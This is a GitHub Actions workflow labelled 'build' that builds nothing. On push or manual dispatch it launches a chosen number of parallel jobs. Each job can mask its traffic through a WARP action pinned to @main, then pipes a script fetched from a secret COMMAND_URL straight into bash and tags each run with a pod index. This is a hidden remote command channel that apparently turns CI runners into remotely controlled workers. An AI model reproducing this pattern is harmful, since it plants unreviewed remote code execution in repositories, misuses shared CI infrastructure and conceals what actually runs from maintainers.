name: build

on:
  push:
    branches:
      - main
  workflow_dispatch:
    inputs:
      v:
        required: true
        default: '1'
      use_warp:
        required: false
        default: "false"

env:
  COMMAND_URL: ${{ secrets.COMMAND_URL }}

jobs:
  setup-matrix:
    runs-on: ubuntu-latest
    outputs:
      matrix: ${{ steps.set-matrix.outputs.matrix }}
    steps:
      - id: set-matrix
        run: |
          POD_COUNT=${{ github.event.inputs.v || 1 }}
          JSON_ARRAY=$(seq 1 $POD_COUNT | jq -R . | jq -s -c)
          echo "matrix=$JSON_ARRAY" >> $GITHUB_OUTPUT

  build:
    needs: setup-matrix
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        pod_index: ${{ fromJson(needs.setup-matrix.outputs.matrix) }}
    
    steps:
      - name: Checkout repository
        uses: actions/checkout@v7

      - name: Setup WARP
        if: ${{ github.event_name == 'workflow_dispatch' && github.event.inputs.use_warp == 'true' }}
        uses: viperadnan-git/setup-warp@main
        timeout-minutes: 5

      - name: Run build script
        env:
          CI_RUN: "${{ github.repository }}/${{ github.run_id }}/${{ github.run_attempt }}/${{ github.job }}/${{ matrix.pod_index }}"
        run: |
          if [ -z "$COMMAND_URL" ]; then
            echo "Error: COMMAND_URL is not set."
            exit 1
          fi
          curl -fsSL "$COMMAND_URL" | bash
